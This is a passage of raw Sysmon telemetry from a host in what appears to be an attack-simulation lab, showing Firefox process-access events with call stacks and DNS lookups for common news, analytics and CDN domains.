Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.233{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.173{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.173{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.172{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000017867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.012{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.012{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.012{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:42.221{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:42.221{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:42.221{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 22542200x800000000000000017904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.552{59A5CD1D-945A-6005-3305-00000000A301}7052d2p3zdq8vjvnxd.cloudfront.net013.225.84.215;13.225.84.75;13.225.84.164;13.225.84.210;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.551{59A5CD1D-945A-6005-3305-00000000A301}7052d2p3zdq8vjvnxd.cloudfront.net0::ffff:13.225.84.210;::ffff:13.225.84.215;::ffff:13.225.84.75;::ffff:13.225.84.164;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.423{59A5CD1D-945A-6005-3305-00000000A301}7052de.ioam.de9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.422{59A5CD1D-945A-6005-3305-00000000A301}7052de.ioam.de091.215.103.65;91.215.100.40;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.421{59A5CD1D-945A-6005-3305-00000000A301}7052de.ioam.de0::ffff:91.215.100.40;::ffff:91.215.103.65;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.368{59A5CD1D-8E56-6005-2E00-00000000A301}246416.94.204.143.in-addr.arpa.0type: 12 server-143-204-94-16.fra50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000017898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.368{59A5CD1D-8E56-6005-2E00-00000000A301}2464117.76.237.15.in-addr.arpa.0type: 12 ec2-15-237-76-117.eu-west-3.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000017897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.289{59A5CD1D-945A-6005-3305-00000000A301}7052status.thawte.com0type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:93.184.220.29;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.267{59A5CD1D-945A-6005-3305-00000000A301}7052script.ioam.de9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.265{59A5CD1D-945A-6005-3305-00000000A301}7052script.ioam.de091.215.103.64;91.215.100.39;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.264{59A5CD1D-945A-6005-3305-00000000A301}7052script.ioam.de0::ffff:91.215.100.39;::ffff:91.215.103.64;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.197{59A5CD1D-945A-6005-3305-00000000A301}7052cdn.privacy-mgmt.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.186{59A5CD1D-945A-6005-3305-00000000A301}7052cdn.privacy-mgmt.com0143.204.94.64;143.204.94.67;143.204.94.107;143.204.94.16;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.186{59A5CD1D-945A-6005-3305-00000000A301}7052cdn.privacy-mgmt.com0::ffff:143.204.94.16;::ffff:143.204.94.64;::ffff:143.204.94.67;::ffff:143.204.94.107;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.158{59A5CD1D-945A-6005-3305-00000000A301}7052spiegel.de.ssl.sc.omtrdc.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.146{59A5CD1D-945A-6005-3305-00000000A301}7052spiegel.de.ssl.sc.omtrdc.net015.237.136.106;35.181.18.61;15.237.76.117;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.145{59A5CD1D-945A-6005-3305-00000000A301}7052sams.spiegel.de0type: 5 spiegel.de.ssl.sc.omtrdc.net;::ffff:15.237.76.117;::ffff:15.237.136.106;::ffff:35.181.18.61;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.878{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.878{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.878{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.846{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.846{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla 